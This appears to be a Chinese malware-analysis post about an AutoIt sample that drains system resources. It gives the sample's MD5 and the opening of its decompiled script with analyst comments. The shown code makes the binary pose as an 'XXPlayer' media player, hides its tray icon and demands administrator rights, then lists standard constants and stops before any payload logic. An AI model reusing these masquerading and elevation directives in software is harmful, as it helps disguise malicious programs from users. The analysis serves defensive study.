一个Autoit恶意资源消耗样本

文件md5:b1c05acd8cbbf1bd9a2448da0c10c411


中毒迹象

一个Autoit恶意资源消耗样本
基本信息获取
一个Autoit恶意资源消耗样本

基本PE信息
一个Autoit恶意资源消耗样本

解码后脚本为:

//2017-12-1 22:43
; ===== Analyst annotation (added during review; not part of the sample) =====
; What follows is the decompiled AutoIt source of the sample whose MD5 is
; given above the listing. The "//2017-12-1 22:43" line is not AutoIt comment
; syntax (AutoIt uses ";"); it looks like a timestamp left by the author or
; the decompiler and is kept verbatim.
; Directives:
;   #NoTrayIcon   - no tray icon while the script runs (less visible to the user).
;   #RequireAdmin - the compiled binary requests elevation before the script
;                   body runs, so an unexpected UAC prompt from an "XXPlayer"
;                   binary is the first visible sign of this sample.
;   #AutoIt3Wrapper_* - version-resource strings ("XXPlayer", 2.2.3.3) and an
;                   icon taken from shell32.dll: the PE masquerades as a media
;                   player. These resource strings are static IoCs for the PE.
#NoTrayIcon
#RequireAdmin
#Region
#AutoIt3Wrapper_icon=C:\Windows\system32\SHELL32.dll|-138
#AutoIt3Wrapper_UseUpx=n
#AutoIt3Wrapper_Res_Comment=XXPlayer
#AutoIt3Wrapper_Res_Description=XXPlayer
#AutoIt3Wrapper_Res_Fileversion=2.2.3.3
#AutoIt3Wrapper_Res_LegalCopyright=XXPlayer
#EndRegion
; The GLOBAL CONST block below appears to be AutoIt standard-include constants
; (GUI events, WS_*/WS_EX_* window styles, WM_* messages, SM_* metrics, ...)
; inlined by the decompiler rather than sample-specific logic. Of all of them,
; only $WS_SYSMENU, $WS_POPUP, $WS_MINIMIZEBOX, $WS_CAPTION, $WS_EX_TOOLWINDOW
; and $WS_EX_WINDOWEDGE are referenced by the sample's own code further down;
; $GUI_SS_DEFAULT_GUI (last line of the block) is defined but never used.
; Nothing in this block needs to be read to understand the sample's behaviour.
GLOBAL CONST $GUI_EVENT_CLOSE = - 3
GLOBAL CONST $GUI_EVENT_MINIMIZE = - 4
GLOBAL CONST $GUI_EVENT_RESTORE = - 5
GLOBAL CONST $GUI_EVENT_MAXIMIZE = - 6
GLOBAL CONST $GUI_EVENT_PRIMARYDOWN = - 7
GLOBAL CONST $GUI_EVENT_PRIMARYUP = - 8
GLOBAL CONST $GUI_EVENT_SECONDARYDOWN = - 9
GLOBAL CONST $GUI_EVENT_SECONDARYUP = - 10
GLOBAL CONST $GUI_EVENT_MOUSEMOVE = - 11
GLOBAL CONST $GUI_EVENT_RESIZED = - 12
GLOBAL CONST $GUI_EVENT_DROPPED = - 13
GLOBAL CONST $GUI_RUNDEFMSG = "GUI_RUNDEFMSG"
GLOBAL CONST $GUI_AVISTOP = 0
GLOBAL CONST $GUI_AVISTART = 1
GLOBAL CONST $GUI_AVICLOSE = 2
GLOBAL CONST $GUI_CHECKED = 1
GLOBAL CONST $GUI_INDETERMINATE = 2
GLOBAL CONST $GUI_UNCHECKED = 4
GLOBAL CONST $GUI_DROPACCEPTED = 8
GLOBAL CONST $GUI_NODROPACCEPTED = 4096
GLOBAL CONST $GUI_ACCEPTFILES = $GUI_DROPACCEPTED
GLOBAL CONST $GUI_SHOW = 16
GLOBAL CONST $GUI_HIDE = 32
GLOBAL CONST $GUI_ENABLE = 64
GLOBAL CONST $GUI_DISABLE = 128
GLOBAL CONST $GUI_FOCUS = 256
GLOBAL CONST $GUI_NOFOCUS = 8192
GLOBAL CONST $GUI_DEFBUTTON = 512
GLOBAL CONST $GUI_EXPAND = 1024
GLOBAL CONST $GUI_ONTOP = 2048
GLOBAL CONST $GUI_FONTITALIC = 2
GLOBAL CONST $GUI_FONTUNDER = 4
GLOBAL CONST $GUI_FONTSTRIKE = 8
GLOBAL CONST $GUI_DOCKAUTO = 1
GLOBAL CONST $GUI_DOCKLEFT = 2
GLOBAL CONST $GUI_DOCKRIGHT = 4
GLOBAL CONST $GUI_DOCKHCENTER = 8
GLOBAL CONST $GUI_DOCKTOP = 32
GLOBAL CONST $GUI_DOCKBOTTOM = 64
GLOBAL CONST $GUI_DOCKVCENTER = 128
GLOBAL CONST $GUI_DOCKWIDTH = 256
GLOBAL CONST $GUI_DOCKHEIGHT = 512
GLOBAL CONST $GUI_DOCKSIZE = 768
GLOBAL CONST $GUI_DOCKMENUBAR = 544
GLOBAL CONST $GUI_DOCKSTATEBAR = 576
GLOBAL CONST $GUI_DOCKALL = 802
GLOBAL CONST $GUI_DOCKBORDERS = 102
GLOBAL CONST $GUI_GR_CLOSE = 1
GLOBAL CONST $GUI_GR_LINE = 2
GLOBAL CONST $GUI_GR_BEZIER = 4
GLOBAL CONST $GUI_GR_MOVE = 6
GLOBAL CONST $GUI_GR_COLOR = 8
GLOBAL CONST $GUI_GR_RECT = 10
GLOBAL CONST $GUI_GR_ELLIPSE = 12
GLOBAL CONST $GUI_GR_PIE = 14
GLOBAL CONST $GUI_GR_DOT = 16
GLOBAL CONST $GUI_GR_PIXEL = 18
GLOBAL CONST $GUI_GR_HINT = 20
GLOBAL CONST $GUI_GR_REFRESH = 22
GLOBAL CONST $GUI_GR_PENSIZE = 24
GLOBAL CONST $GUI_GR_NOBKCOLOR = - 2
GLOBAL CONST $GUI_BKCOLOR_DEFAULT = - 1
GLOBAL CONST $GUI_BKCOLOR_TRANSPARENT = - 2
GLOBAL CONST $GUI_BKCOLOR_LV_ALTERNATE = -33554432
GLOBAL CONST $GUI_WS_EX_PARENTDRAG = 1048576
GLOBAL CONST $WS_TILED = 0
GLOBAL CONST $WS_OVERLAPPED = 0
GLOBAL CONST $WS_MAXIMIZEBOX = 65536
GLOBAL CONST $WS_MINIMIZEBOX = 131072
GLOBAL CONST $WS_TABSTOP = 65536
GLOBAL CONST $WS_GROUP = 131072
GLOBAL CONST $WS_SIZEBOX = 262144
GLOBAL CONST $WS_THICKFRAME = 262144
GLOBAL CONST $WS_SYSMENU = 524288
GLOBAL CONST $WS_HSCROLL = 1048576
GLOBAL CONST $WS_VSCROLL = 2097152
GLOBAL CONST $WS_DLGFRAME = 4194304
GLOBAL CONST $WS_BORDER = 8388608
GLOBAL CONST $WS_CAPTION = 12582912
GLOBAL CONST $WS_OVERLAPPEDWINDOW = 13565952
GLOBAL CONST $WS_TILEDWINDOW = 13565952
GLOBAL CONST $WS_MAXIMIZE = 16777216
GLOBAL CONST $WS_CLIPCHILDREN = 33554432
GLOBAL CONST $WS_CLIPSIBLINGS = 67108864
GLOBAL CONST $WS_DISABLED = 134217728
GLOBAL CONST $WS_VISIBLE = 268435456
GLOBAL CONST $WS_MINIMIZE = 536870912
GLOBAL CONST $WS_CHILD = 1073741824
GLOBAL CONST $WS_POPUP = -2147483648
GLOBAL CONST $WS_POPUPWINDOW = -2138570752
GLOBAL CONST $DS_MODALFRAME = 128
GLOBAL CONST $DS_SETFOREGROUND = 512
GLOBAL CONST $DS_CONTEXTHELP = 8192
GLOBAL CONST $WS_EX_ACCEPTFILES = 16
GLOBAL CONST $WS_EX_MDICHILD = 64
GLOBAL CONST $WS_EX_APPWINDOW = 262144
GLOBAL CONST $WS_EX_COMPOSITED = 33554432
GLOBAL CONST $WS_EX_CLIENTEDGE = 512
GLOBAL CONST $WS_EX_CONTEXTHELP = 1024
GLOBAL CONST $WS_EX_DLGMODALFRAME = 1
GLOBAL CONST $WS_EX_LEFTSCROLLBAR = 16384
GLOBAL CONST $WS_EX_OVERLAPPEDWINDOW = 768
GLOBAL CONST $WS_EX_RIGHT = 4096
GLOBAL CONST $WS_EX_STATICEDGE = 131072
GLOBAL CONST $WS_EX_TOOLWINDOW = 128
GLOBAL CONST $WS_EX_TOPMOST = 8
GLOBAL CONST $WS_EX_TRANSPARENT = 32
GLOBAL CONST $WS_EX_WINDOWEDGE = 256
GLOBAL CONST $WS_EX_LAYERED = 524288
GLOBAL CONST $WS_EX_CONTROLPARENT = 65536
GLOBAL CONST $WS_EX_LAYOUTRTL = 4194304
GLOBAL CONST $WS_EX_RTLREADING = 8192
GLOBAL CONST $WM_GETTEXTLENGTH = 14
GLOBAL CONST $WM_GETTEXT = 13
GLOBAL CONST $WM_SIZE = 5
GLOBAL CONST $WM_SIZING = 532
GLOBAL CONST $WM_USER = 1024
GLOBAL CONST $WM_CREATE = 1
GLOBAL CONST $WM_DESTROY = 2
GLOBAL CONST $WM_MOVE = 3
GLOBAL CONST $WM_ACTIVATE = 6
GLOBAL CONST $WM_SETFOCUS = 7
GLOBAL CONST $WM_KILLFOCUS = 8
GLOBAL CONST $WM_ENABLE = 10
GLOBAL CONST $WM_SETREDRAW = 11
GLOBAL CONST $WM_SETTEXT = 12
GLOBAL CONST $WM_PAINT = 15
GLOBAL CONST $WM_CLOSE = 16
GLOBAL CONST $WM_QUIT = 18
GLOBAL CONST $WM_ERASEBKGND = 20
GLOBAL CONST $WM_SYSCOLORCHANGE = 21
GLOBAL CONST $WM_SHOWWINDOW = 24
GLOBAL CONST $WM_WININICHANGE = 26
GLOBAL CONST $WM_DEVMODECHANGE = 27
GLOBAL CONST $WM_ACTIVATEAPP = 28
GLOBAL CONST $WM_FONTCHANGE = 29
GLOBAL CONST $WM_TIMECHANGE = 30
GLOBAL CONST $WM_CANCELMODE = 31
GLOBAL CONST $WM_SETCURSOR = 32
GLOBAL CONST $WM_MOUSEACTIVATE = 33
GLOBAL CONST $WM_CHILDACTIVATE = 34
GLOBAL CONST $WM_QUEUESYNC = 35
GLOBAL CONST $WM_GETMINMAXINFO = 36
GLOBAL CONST $WM_PAINTICON = 38
GLOBAL CONST $WM_ICONERASEBKGND = 39
GLOBAL CONST $WM_NEXTDLGCTL = 40
GLOBAL CONST $WM_SPOOLERSTATUS = 42
GLOBAL CONST $WM_DRAWITEM = 43
GLOBAL CONST $WM_MEASUREITEM = 44
GLOBAL CONST $WM_DELETEITEM = 45
GLOBAL CONST $WM_VKEYTOITEM = 46
GLOBAL CONST $WM_CHARTOITEM = 47
GLOBAL CONST $WM_SETFONT = 48
GLOBAL CONST $WM_GETFONT = 49
GLOBAL CONST $WM_SETHOTKEY = 50
GLOBAL CONST $WM_GETHOTKEY = 51
GLOBAL CONST $WM_QUERYDRAGICON = 55
GLOBAL CONST $WM_COMPAREITEM = 57
GLOBAL CONST $WM_GETOBJECT = 61
GLOBAL CONST $WM_COMPACTING = 65
GLOBAL CONST $WM_COMMNOTIFY = 68
GLOBAL CONST $WM_WINDOWPOSCHANGING = 70
GLOBAL CONST $WM_WINDOWPOSCHANGED = 71
GLOBAL CONST $WM_POWER = 72
GLOBAL CONST $WM_NOTIFY = 78
GLOBAL CONST $WM_COPYDATA = 74
GLOBAL CONST $WM_CANCELJOURNAL = 75
GLOBAL CONST $WM_INPUTLANGCHANGEREQUEST = 80
GLOBAL CONST $WM_INPUTLANGCHANGE = 81
GLOBAL CONST $WM_TCARD = 82
GLOBAL CONST $WM_HELP = 83
GLOBAL CONST $WM_USERCHANGED = 84
GLOBAL CONST $WM_NOTIFYFORMAT = 85
GLOBAL CONST $WM_CUT = 768
GLOBAL CONST $WM_COPY = 769
GLOBAL CONST $WM_PASTE = 770
GLOBAL CONST $WM_CLEAR = 771
GLOBAL CONST $WM_UNDO = 772
GLOBAL CONST $WM_CONTEXTMENU = 123
GLOBAL CONST $WM_STYLECHANGING = 124
GLOBAL CONST $WM_STYLECHANGED = 125
GLOBAL CONST $WM_DISPLAYCHANGE = 126
GLOBAL CONST $WM_GETICON = 127
GLOBAL CONST $WM_SETICON = 128
GLOBAL CONST $WM_NCCREATE = 129
GLOBAL CONST $WM_NCDESTROY = 130
GLOBAL CONST $WM_NCCALCSIZE = 131
GLOBAL CONST $WM_NCHITTEST = 132
GLOBAL CONST $WM_NCPAINT = 133
GLOBAL CONST $WM_NCACTIVATE = 134
GLOBAL CONST $WM_GETDLGCODE = 135
GLOBAL CONST $WM_SYNCPAINT = 136
GLOBAL CONST $WM_NCMOUSEMOVE = 160
GLOBAL CONST $WM_NCLBUTTONDOWN = 161
GLOBAL CONST $WM_NCLBUTTONUP = 162
GLOBAL CONST $WM_NCLBUTTONDBLCLK = 163
GLOBAL CONST $WM_NCRBUTTONDOWN = 164
GLOBAL CONST $WM_NCRBUTTONUP = 165
GLOBAL CONST $WM_NCRBUTTONDBLCLK = 166
GLOBAL CONST $WM_NCMBUTTONDOWN = 167
GLOBAL CONST $WM_NCMBUTTONUP = 168
GLOBAL CONST $WM_NCMBUTTONDBLCLK = 169
GLOBAL CONST $WM_KEYDOWN = 256
GLOBAL CONST $WM_KEYUP = 257
GLOBAL CONST $WM_CHAR = 258
GLOBAL CONST $WM_DEADCHAR = 259
GLOBAL CONST $WM_SYSKEYDOWN = 260
GLOBAL CONST $WM_SYSKEYUP = 261
GLOBAL CONST $WM_SYSCHAR = 262
GLOBAL CONST $WM_SYSDEADCHAR = 263
GLOBAL CONST $WM_INITDIALOG = 272
GLOBAL CONST $WM_COMMAND = 273
GLOBAL CONST $WM_SYSCOMMAND = 274
GLOBAL CONST $WM_TIMER = 275
GLOBAL CONST $WM_HSCROLL = 276
GLOBAL CONST $WM_VSCROLL = 277
GLOBAL CONST $WM_INITMENU = 278
GLOBAL CONST $WM_INITMENUPOPUP = 279
GLOBAL CONST $WM_MENUSELECT = 287
GLOBAL CONST $WM_MENUCHAR = 288
GLOBAL CONST $WM_ENTERIDLE = 289
GLOBAL CONST $WM_MENURBUTTONUP = 290
GLOBAL CONST $WM_MENUDRAG = 291
GLOBAL CONST $WM_MENUGETOBJECT = 292
GLOBAL CONST $WM_UNINITMENUPOPUP = 293
GLOBAL CONST $WM_MENUCOMMAND = 294
GLOBAL CONST $WM_CHANGEUISTATE = 295
GLOBAL CONST $WM_UPDATEUISTATE = 296
GLOBAL CONST $WM_QUERYUISTATE = 297
GLOBAL CONST $WM_CTLCOLORMSGBOX = 306
GLOBAL CONST $WM_CTLCOLOREDIT = 307
GLOBAL CONST $WM_CTLCOLORLISTBOX = 308
GLOBAL CONST $WM_CTLCOLORBTN = 309
GLOBAL CONST $WM_CTLCOLORDLG = 310
GLOBAL CONST $WM_CTLCOLORSCROLLBAR = 311
GLOBAL CONST $WM_CTLCOLORSTATIC = 312
GLOBAL CONST $WM_CTLCOLOR = 25
GLOBAL CONST $MN_GETHMENU = 481
GLOBAL CONST $NM_FIRST = 0
GLOBAL CONST $NM_OUTOFMEMORY = $NM_FIRST - 1
GLOBAL CONST $NM_CLICK = $NM_FIRST - 2
GLOBAL CONST $NM_DBLCLK = $NM_FIRST - 3
GLOBAL CONST $NM_RETURN = $NM_FIRST - 4
GLOBAL CONST $NM_RCLICK = $NM_FIRST - 5
GLOBAL CONST $NM_RDBLCLK = $NM_FIRST - 6
GLOBAL CONST $NM_SETFOCUS = $NM_FIRST - 7
GLOBAL CONST $NM_KILLFOCUS = $NM_FIRST - 8
GLOBAL CONST $NM_CUSTOMDRAW = $NM_FIRST - 12
GLOBAL CONST $NM_HOVER = $NM_FIRST - 13
GLOBAL CONST $NM_NCHITTEST = $NM_FIRST - 14
GLOBAL CONST $NM_KEYDOWN = $NM_FIRST - 15
GLOBAL CONST $NM_RELEASEDCAPTURE = $NM_FIRST - 16
GLOBAL CONST $NM_SETCURSOR = $NM_FIRST - 17
GLOBAL CONST $NM_CHAR = $NM_FIRST - 18
GLOBAL CONST $NM_TOOLTIPSCREATED = $NM_FIRST - 19
GLOBAL CONST $NM_LDOWN = $NM_FIRST - 20
GLOBAL CONST $NM_RDOWN = $NM_FIRST - 21
GLOBAL CONST $NM_THEMECHANGED = $NM_FIRST - 22
GLOBAL CONST $WM_MOUSEMOVE = 512
GLOBAL CONST $WM_LBUTTONDOWN = 513
GLOBAL CONST $WM_LBUTTONUP = 514
GLOBAL CONST $WM_LBUTTONDBLCLK = 515
GLOBAL CONST $WM_RBUTTONDOWN = 516
GLOBAL CONST $WM_RBUTTONUP = 517
GLOBAL CONST $WM_RBUTTONDBLCK = 518
GLOBAL CONST $WM_MBUTTONDOWN = 519
GLOBAL CONST $WM_MBUTTONUP = 520
GLOBAL CONST $WM_MBUTTONDBLCK = 521
GLOBAL CONST $WM_MOUSEWHEEL = 522
GLOBAL CONST $WM_XBUTTONDOWN = 523
GLOBAL CONST $WM_XBUTTONUP = 524
GLOBAL CONST $WM_XBUTTONDBLCLK = 525
GLOBAL CONST $WM_MOUSEHWHEEL = 526
GLOBAL CONST $PS_SOLID = 0
GLOBAL CONST $PS_DASH = 1
GLOBAL CONST $PS_DOT = 2
GLOBAL CONST $PS_DASHDOT = 3
GLOBAL CONST $PS_DASHDOTDOT = 4
GLOBAL CONST $PS_NULL = 5
GLOBAL CONST $PS_INSIDEFRAME = 6
GLOBAL CONST $LWA_ALPHA = 2
GLOBAL CONST $LWA_COLORKEY = 1
GLOBAL CONST $RGN_AND = 1
GLOBAL CONST $RGN_OR = 2
GLOBAL CONST $RGN_XOR = 3
GLOBAL CONST $RGN_DIFF = 4
GLOBAL CONST $RGN_COPY = 5
GLOBAL CONST $ERRORREGION = 0
GLOBAL CONST $NULLREGION = 1
GLOBAL CONST $SIMPLEREGION = 2
GLOBAL CONST $COMPLEXREGION = 3
GLOBAL CONST $TRANSPARENT = 1
GLOBAL CONST $OPAQUE = 2
GLOBAL CONST $CCM_FIRST = 8192
GLOBAL CONST $CCM_GETUNICODEFORMAT = ( $CCM_FIRST + 6 )
GLOBAL CONST $CCM_SETUNICODEFORMAT = ( $CCM_FIRST + 5 )
GLOBAL CONST $CCM_SETBKCOLOR = $CCM_FIRST + 1
GLOBAL CONST $CCM_SETCOLORSCHEME = $CCM_FIRST + 2
GLOBAL CONST $CCM_GETCOLORSCHEME = $CCM_FIRST + 3
GLOBAL CONST $CCM_GETDROPTARGET = $CCM_FIRST + 4
GLOBAL CONST $CCM_SETWINDOWTHEME = $CCM_FIRST + 11
GLOBAL CONST $GA_PARENT = 1
GLOBAL CONST $GA_ROOT = 2
GLOBAL CONST $GA_ROOTOWNER = 3
GLOBAL CONST $SM_CXSCREEN = 0
GLOBAL CONST $SM_CYSCREEN = 1
GLOBAL CONST $SM_CXVSCROLL = 2
GLOBAL CONST $SM_CYHSCROLL = 3
GLOBAL CONST $SM_CYCAPTION = 4
GLOBAL CONST $SM_CXBORDER = 5
GLOBAL CONST $SM_CYBORDER = 6
GLOBAL CONST $SM_CXDLGFRAME = 7
GLOBAL CONST $SM_CYDLGFRAME = 8
GLOBAL CONST $SM_CYVTHUMB = 9
GLOBAL CONST $SM_CXHTHUMB = 10
GLOBAL CONST $SM_CXICON = 11
GLOBAL CONST $SM_CYICON = 12
GLOBAL CONST $SM_CXCURSOR = 13
GLOBAL CONST $SM_CYCURSOR = 14
GLOBAL CONST $SM_CYMENU = 15
GLOBAL CONST $SM_CXFULLSCREEN = 16
GLOBAL CONST $SM_CYFULLSCREEN = 17
GLOBAL CONST $SM_CYKANJIWINDOW = 18
GLOBAL CONST $SM_MOUSEPRESENT = 19
GLOBAL CONST $SM_CYVSCROLL = 20
GLOBAL CONST $SM_CXHSCROLL = 21
GLOBAL CONST $SM_DEBUG = 22
GLOBAL CONST $SM_SWAPBUTTON = 23
GLOBAL CONST $SM_RESERVED1 = 24
GLOBAL CONST $SM_RESERVED2 = 25
GLOBAL CONST $SM_RESERVED3 = 26
GLOBAL CONST $SM_RESERVED4 = 27
GLOBAL CONST $SM_CXMIN = 28
GLOBAL CONST $SM_CYMIN = 29
GLOBAL CONST $SM_CXSIZE = 30
GLOBAL CONST $SM_CYSIZE = 31
GLOBAL CONST $SM_CXFRAME = 32
GLOBAL CONST $SM_CYFRAME = 33
GLOBAL CONST $SM_CXMINTRACK = 34
GLOBAL CONST $SM_CYMINTRACK = 35
GLOBAL CONST $SM_CXDOUBLECLK = 36
GLOBAL CONST $SM_CYDOUBLECLK = 37
GLOBAL CONST $SM_CXICONSPACING = 38
GLOBAL CONST $SM_CYICONSPACING = 39
GLOBAL CONST $SM_MENUDROPALIGNMENT = 40
GLOBAL CONST $SM_PENWINDOWS = 41
GLOBAL CONST $SM_DBCSENABLED = 42
GLOBAL CONST $SM_CMOUSEBUTTONS = 43
GLOBAL CONST $SM_SECURE = 44
GLOBAL CONST $SM_CXEDGE = 45
GLOBAL CONST $SM_CYEDGE = 46
GLOBAL CONST $SM_CXMINSPACING = 47
GLOBAL CONST $SM_CYMINSPACING = 48
GLOBAL CONST $SM_CXSMICON = 49
GLOBAL CONST $SM_CYSMICON = 50
GLOBAL CONST $SM_CYSMCAPTION = 51
GLOBAL CONST $SM_CXSMSIZE = 52
GLOBAL CONST $SM_CYSMSIZE = 53
GLOBAL CONST $SM_CXMENUSIZE = 54
GLOBAL CONST $SM_CYMENUSIZE = 55
GLOBAL CONST $SM_ARRANGE = 56
GLOBAL CONST $SM_CXMINIMIZED = 57
GLOBAL CONST $SM_CYMINIMIZED = 58
GLOBAL CONST $SM_CXMAXTRACK = 59
GLOBAL CONST $SM_CYMAXTRACK = 60
GLOBAL CONST $SM_CXMAXIMIZED = 61
GLOBAL CONST $SM_CYMAXIMIZED = 62
GLOBAL CONST $SM_NETWORK = 63
GLOBAL CONST $SM_CLEANBOOT = 67
GLOBAL CONST $SM_CXDRAG = 68
GLOBAL CONST $SM_CYDRAG = 69
GLOBAL CONST $SM_SHOWSOUNDS = 70
GLOBAL CONST $SM_CXMENUCHECK = 71
GLOBAL CONST $SM_CYMENUCHECK = 72
GLOBAL CONST $SM_SLOWMACHINE = 73
GLOBAL CONST $SM_MIDEASTENABLED = 74
GLOBAL CONST $SM_MOUSEWHEELPRESENT = 75
GLOBAL CONST $SM_XVIRTUALSCREEN = 76
GLOBAL CONST $SM_YVIRTUALSCREEN = 77
GLOBAL CONST $SM_CXVIRTUALSCREEN = 78
GLOBAL CONST $SM_CYVIRTUALSCREEN = 79
GLOBAL CONST $SM_CMONITORS = 80
GLOBAL CONST $SM_SAMEDISPLAYFORMAT = 81
GLOBAL CONST $SM_IMMENABLED = 82
GLOBAL CONST $SM_CXFOCUSBORDER = 83
GLOBAL CONST $SM_CYFOCUSBORDER = 84
GLOBAL CONST $SM_TABLETPC = 86
GLOBAL CONST $SM_MEDIACENTER = 87
GLOBAL CONST $SM_STARTER = 88
GLOBAL CONST $SM_SERVERR2 = 89
GLOBAL CONST $SM_CMETRICS = 90
GLOBAL CONST $SM_REMOTESESSION = 4096
GLOBAL CONST $SM_SHUTTINGDOWN = 8192
GLOBAL CONST $SM_REMOTECONTROL = 8193
GLOBAL CONST $SM_CARETBLINKINGENABLED = 8194
GLOBAL CONST $BLACKNESS = 66
GLOBAL CONST $CAPTUREBLT = 1073741824
GLOBAL CONST $DSTINVERT = 5570569
GLOBAL CONST $MERGECOPY = 12583114
GLOBAL CONST $MERGEPAINT = 12255782
GLOBAL CONST $NOMIRRORBITMAP = -2147483648
GLOBAL CONST $NOTSRCCOPY = 3342344
GLOBAL CONST $NOTSRCERASE = 1114278
GLOBAL CONST $PATCOPY = 15728673
GLOBAL CONST $PATINVERT = 5898313
GLOBAL CONST $PATPAINT = 16452105
GLOBAL CONST $SRCAND = 8913094
GLOBAL CONST $SRCCOPY = 13369376
GLOBAL CONST $SRCERASE = 4457256
GLOBAL CONST $SRCINVERT = 6684742
GLOBAL CONST $SRCPAINT = 15597702
GLOBAL CONST $WHITENESS = 16711778
GLOBAL CONST $DT_BOTTOM = 8
GLOBAL CONST $DT_CALCRECT = 1024
GLOBAL CONST $DT_CENTER = 1
GLOBAL CONST $DT_EDITCONTROL = 8192
GLOBAL CONST $DT_END_ELLIPSIS = 32768
GLOBAL CONST $DT_EXPANDTABS = 64
GLOBAL CONST $DT_EXTERNALLEADING = 512
GLOBAL CONST $DT_HIDEPREFIX = 1048576
GLOBAL CONST $DT_INTERNAL = 4096
GLOBAL CONST $DT_LEFT = 0
GLOBAL CONST $DT_MODIFYSTRING = 65536
GLOBAL CONST $DT_NOCLIP = 256
GLOBAL CONST $DT_NOFULLWIDTHCHARBREAK = 524288
GLOBAL CONST $DT_NOPREFIX = 2048
GLOBAL CONST $DT_PATH_ELLIPSIS = 16384
GLOBAL CONST $DT_PREFIXONLY = 2097152
GLOBAL CONST $DT_RIGHT = 2
GLOBAL CONST $DT_RTLREADING = 131072
GLOBAL CONST $DT_SINGLELINE = 32
GLOBAL CONST $DT_TABSTOP = 128
GLOBAL CONST $DT_TOP = 0
GLOBAL CONST $DT_VCENTER = 4
GLOBAL CONST $DT_WORDBREAK = 16
GLOBAL CONST $DT_WORD_ELLIPSIS = 262144
GLOBAL CONST $RDW_ERASE = 4
GLOBAL CONST $RDW_FRAME = 1024
GLOBAL CONST $RDW_INTERNALPAINT = 2
GLOBAL CONST $RDW_INVALIDATE = 1
GLOBAL CONST $RDW_NOERASE = 32
GLOBAL CONST $RDW_NOFRAME = 2048
GLOBAL CONST $RDW_NOINTERNALPAINT = 16
GLOBAL CONST $RDW_VALIDATE = 8
GLOBAL CONST $RDW_ERASENOW = 512
GLOBAL CONST $RDW_UPDATENOW = 256
GLOBAL CONST $RDW_ALLCHILDREN = 128
GLOBAL CONST $RDW_NOCHILDREN = 64
GLOBAL CONST $WM_RENDERFORMAT = 773
GLOBAL CONST $WM_RENDERALLFORMATS = 774
GLOBAL CONST $WM_DESTROYCLIPBOARD = 775
GLOBAL CONST $WM_DRAWCLIPBOARD = 776
GLOBAL CONST $WM_PAINTCLIPBOARD = 777
GLOBAL CONST $WM_VSCROLLCLIPBOARD = 778
GLOBAL CONST $WM_SIZECLIPBOARD = 779
GLOBAL CONST $WM_ASKCBFORMATNAME = 780
GLOBAL CONST $WM_CHANGECBCHAIN = 781
GLOBAL CONST $WM_HSCROLLCLIPBOARD = 782
GLOBAL CONST $HTERROR = - 2
GLOBAL CONST $HTTRANSPARENT = - 1
GLOBAL CONST $HTNOWHERE = 0
GLOBAL CONST $HTCLIENT = 1
GLOBAL CONST $HTCAPTION = 2
GLOBAL CONST $HTSYSMENU = 3
GLOBAL CONST $HTGROWBOX = 4
GLOBAL CONST $HTSIZE = $HTGROWBOX
GLOBAL CONST $HTMENU = 5
GLOBAL CONST $HTHSCROLL = 6
GLOBAL CONST $HTVSCROLL = 7
GLOBAL CONST $HTMINBUTTON = 8
GLOBAL CONST $HTMAXBUTTON = 9
GLOBAL CONST $HTLEFT = 10
GLOBAL CONST $HTRIGHT = 11
GLOBAL CONST $HTTOP = 12
GLOBAL CONST $HTTOPLEFT = 13
GLOBAL CONST $HTTOPRIGHT = 14
GLOBAL CONST $HTBOTTOM = 15
GLOBAL CONST $HTBOTTOMLEFT = 16
GLOBAL CONST $HTBOTTOMRIGHT = 17
GLOBAL CONST $HTBORDER = 18
GLOBAL CONST $HTREDUCE = $HTMINBUTTON
GLOBAL CONST $HTZOOM = $HTMAXBUTTON
GLOBAL CONST $HTSIZEFIRST = $HTLEFT
GLOBAL CONST $HTSIZELAST = $HTBOTTOMRIGHT
GLOBAL CONST $HTOBJECT = 19
GLOBAL CONST $HTCLOSE = 20
GLOBAL CONST $HTHELP = 21
GLOBAL CONST $COLOR_SCROLLBAR = 0
GLOBAL CONST $COLOR_BACKGROUND = 1
GLOBAL CONST $COLOR_ACTIVECAPTION = 2
GLOBAL CONST $COLOR_INACTIVECAPTION = 3
GLOBAL CONST $COLOR_MENU = 4
GLOBAL CONST $COLOR_WINDOW = 5
GLOBAL CONST $COLOR_WINDOWFRAME = 6
GLOBAL CONST $COLOR_MENUTEXT = 7
GLOBAL CONST $COLOR_WINDOWTEXT = 8
GLOBAL CONST $COLOR_CAPTIONTEXT = 9
GLOBAL CONST $COLOR_ACTIVEBORDER = 10
GLOBAL CONST $COLOR_INACTIVEBORDER = 11
GLOBAL CONST $COLOR_APPWORKSPACE = 12
GLOBAL CONST $COLOR_HIGHLIGHT = 13
GLOBAL CONST $COLOR_HIGHLIGHTTEXT = 14
GLOBAL CONST $COLOR_BTNFACE = 15
GLOBAL CONST $COLOR_BTNSHADOW = 16
GLOBAL CONST $COLOR_GRAYTEXT = 17
GLOBAL CONST $COLOR_BTNTEXT = 18
GLOBAL CONST $COLOR_INACTIVECAPTIONTEXT = 19
GLOBAL CONST $COLOR_BTNHIGHLIGHT = 20
GLOBAL CONST $COLOR_3DDKSHADOW = 21
GLOBAL CONST $COLOR_3DLIGHT = 22
GLOBAL CONST $COLOR_INFOTEXT = 23
GLOBAL CONST $COLOR_INFOBK = 24
GLOBAL CONST $COLOR_HOTLIGHT = 26
GLOBAL CONST $COLOR_GRADIENTACTIVECAPTION = 27
GLOBAL CONST $COLOR_GRADIENTINACTIVECAPTION = 28
GLOBAL CONST $COLOR_MENUHILIGHT = 29
GLOBAL CONST $COLOR_MENUBAR = 30
GLOBAL CONST $COLOR_DESKTOP = 1
GLOBAL CONST $COLOR_3DFACE = 15
GLOBAL CONST $COLOR_3DSHADOW = 16
GLOBAL CONST $COLOR_3DHIGHLIGHT = 20
GLOBAL CONST $COLOR_3DHILIGHT = 20
GLOBAL CONST $COLOR_BTNHILIGHT = 20
GLOBAL CONST $HINST_COMMCTRL = - 1
GLOBAL CONST $IDB_STD_SMALL_COLOR = 0
GLOBAL CONST $IDB_STD_LARGE_COLOR = 1
GLOBAL CONST $IDB_VIEW_SMALL_COLOR = 4
GLOBAL CONST $IDB_VIEW_LARGE_COLOR = 5
GLOBAL CONST $IDB_HIST_SMALL_COLOR = 8
GLOBAL CONST $IDB_HIST_LARGE_COLOR = 9
GLOBAL CONST $STARTF_FORCEOFFFEEDBACK = 128
GLOBAL CONST $STARTF_FORCEONFEEDBACK = 64
GLOBAL CONST $STARTF_RUNFULLSCREEN = 32
GLOBAL CONST $STARTF_USECOUNTCHARS = 8
GLOBAL CONST $STARTF_USEFILLATTRIBUTE = 16
GLOBAL CONST $STARTF_USEHOTKEY = 512
GLOBAL CONST $STARTF_USEPOSITION = 4
